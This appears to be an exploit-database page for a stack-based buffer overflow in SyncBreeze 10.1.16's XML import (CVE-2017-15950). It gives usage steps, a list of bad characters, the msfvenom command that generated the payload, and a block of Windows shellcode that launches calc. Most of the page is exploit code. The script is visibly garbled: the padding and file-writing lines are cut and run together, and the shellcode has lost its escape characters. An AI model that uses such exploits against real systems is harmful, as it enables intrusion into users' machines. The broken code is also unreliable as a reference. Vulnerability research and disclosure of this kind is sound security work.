SyncBreeze 10.1.16 – XML Parsing Stack-based Buffer Overflow

# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
# Date: 03/27/2021
# Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado  - nnszs[at]protonmail.com
# Vendor: https://www.syncbreeze.com/
# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html
# Version: SyncBreeze v10.1.16 x86
# Tested on: Windows 10 x64 (19042.867)
# CVE: CVE-2017-15950

Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. 

# -*- coding: utf-8 -*-
    
import struct

# badchars
#x00x0ax0dx20x27
#x81x82x83x84x85x86x87x88
#x89x8Ax8Bx8Cx8Dx8Ex8Fx90
#x91x92x93x94x95x96x97x98
#x99x9Ax9Bx9Cx9Dx9Ex9FxA0
#xA1xA2xA3xA4xA5xA6xA7xA8
#xA9xAAxABxACxADxAExAFxB0
#xB1xB2xB3xB4xB5xB6xB7xB8
#xB9xBAxBBxBCxBDxBExBFxC0
#xC1xC2xC3xC4xC5xC6xC7xC8
#xC9xCAxCBxCCxCDxCExCFxD0
#xD1xD2xD3xD4xD5xD6xD7xD8
#xD9xDAxDBxDCxDDxDExDFxE0
#xE1xE2xE3xE4xE5xE6xE7xE8
#xE9xEAxEBxECxEDxEExEFxF0
#xF1xF2xF3xF4xF5xF6xF7xF8
#xF9xFAxFBxFCxFDxFExFF

# Shellcode payload size: 432 bytes
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b 'x00x0Ax0Dx20x27' -v shellcode -f python

shellcode =  b""
shellcode += b"x50x59x49x49x49x49x49x49x49x49x49"
shellcode += b"x49x49x49x49x49x49x49x37x51x5ax6a"
shellcode += b"x41x58x50x30x41x30x41x6bx41x41x51"
shellcode += b"x32x41x42x32x42x42x30x42x42x41x42"
shellcode += b"x58x50x38x41x42x75x4ax49x6bx4cx69"
shellcode += b"x78x4ex62x75x50x77x70x35x50x45x30"
shellcode += b"x4bx39x59x75x55x61x39x50x52x44x4e"
shellcode += b"x6bx42x70x50x30x6ex6bx42x72x54x4c"
shellcode += b"x6cx4bx70x52x74x54x4cx4bx62x52x66"
shellcode += b"x48x44x4fx48x37x61x5ax51x36x45x61"
shellcode += b"x39x6fx6ex4cx75x6cx43x51x71x6cx65"
shellcode += b"x52x56x4cx47x50x4bx71x38x4fx74x4d"
shellcode += b"x37x71x49x57x38x62x7ax52x52x72x36"
shellcode += b"x37x4cx4bx63x62x42x30x6cx4bx31x5a"
shellcode += b"x57x4cx4cx4bx32x6cx36x71x31x68x4a"
shellcode += b"x43x47x38x47x71x4ax71x76x31x6cx4b"
shellcode += b"x36x39x67x50x66x61x58x53x4cx4bx70"
shellcode += b"x49x66x78x59x73x34x7ax53x79x6ex6b"
shellcode += b"x50x34x4cx4bx66x61x4ex36x55x61x39"
shellcode += b"x6fx4cx6cx4ax61x4ax6fx34x4dx67x71"
shellcode += b"x48x47x67x48x69x70x71x65x59x66x54"
shellcode += b"x43x63x4dx79x68x75x6bx73x4dx67x54"
shellcode += b"x44x35x79x74x72x78x4ex6bx53x68x71"
shellcode += b"x34x57x71x5ax73x52x46x6cx4bx36x6c"
shellcode += b"x72x6bx6cx4bx76x38x75x4cx67x71x68"
shellcode += b"x53x6ex6bx57x74x4ex6bx63x31x78x50"
shellcode += b"x6fx79x73x74x47x54x64x64x53x6bx31"
shellcode += b"x4bx63x51x50x59x63x6ax43x61x39x6f"
shellcode += b"x59x70x73x6fx31x4fx62x7ax4ex6bx44"
shellcode += b"x52x6ax4bx4ex6dx53x6dx73x5ax63x31"
shellcode += b"x4cx4dx4dx55x6fx42x75x50x47x70x33"
shellcode += b"x30x46x30x50x68x74x71x6cx4bx42x4f"
shellcode += b"x6ex67x39x6fx6ex35x6fx4bx58x70x78"
shellcode += b"x35x79x32x46x36x33x58x79x36x4cx55"
shellcode += b"x4fx4dx6dx4dx39x6fx6ax75x55x6cx63"
shellcode += b"x36x61x6cx45x5ax6dx50x49x6bx39x70"
shellcode += b"x32x55x75x55x6dx6bx57x37x64x53x74"
shellcode += b"x32x52x4fx50x6ax53x30x61x43x59x6f"
shellcode += b"x78x55x73x53x30x61x30x6cx72x43x43"
shellcode += b"x30x41x41"


# padding to crash buffer
basura = struct.pack('nn".encode('utf-8'))

payload.write("nn".encode('utf-8'))

payload.close()
            

Comments are closed.